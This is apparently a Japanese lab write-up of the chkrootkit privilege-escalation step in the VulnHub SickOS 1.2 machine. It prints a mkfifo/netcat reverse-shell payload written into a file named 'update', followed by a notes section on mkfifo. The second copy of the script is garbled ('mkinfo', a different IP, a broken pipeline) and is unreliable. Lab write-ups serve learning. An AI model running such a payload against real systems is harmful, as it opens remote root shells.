SickOS 1.2 侵入部分(chkrootkit, mkifio)
参考文献
いつもありがとうございます
【VulnHub】SickOs: 1.2 - Walkthrough - - Qiita
chkrootkitについて
rootkitが存在するかどうかを確認してくれるツール
参考:https://centossrv.com/chkrootkit.shtml
脆弱性の内容とexploit codeの内容
脆弱性の内容としては、
chkrootkitのスクリプトは、updateという名前のファイルを自動的に動かしてしまうらしい
そこで、そういった名前のファイルを用意する
中身はリバースシェルである
コードを書き込むペイロードは以下
$ echo '#!/bin/bash' > update
$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.16.208.178 443 >/tmp/f' >> update
$ chmod 777 update
こうして書かれたスクリプトは
#!/bin/bash
rm /tmp/f;
mkinfo /tmp/f;
cat /tmp/f
| /bin/sh -i 2>&1
| nc 192.168.3.22 443 > /tmp/f;
となります
fを出力し、bashを起動し、ncでつなぎにいき、fに出力を戻す
んー、これでifioが動くのか…ちょっとよくわからない…
mkfifoコマンド
これ、知らなかったです(白目
https://qiita.com/richmikan@github/items/bb660a58690ac01ec295:
プロセス間通信(IPC)の方式の一つのようです
出来上がったファイルに何かを書き込もうとするとブロックモードになり、別ターミナル等でファイルを書き出すとブロックが解除され、書き込んだ内容が書き出される
逆に何もない状態でファイルを書き出そうとすると同様にブロックモードとなり、別でファイルに書き込むとブロックが解除されて書き込んだ情報が出力される
以上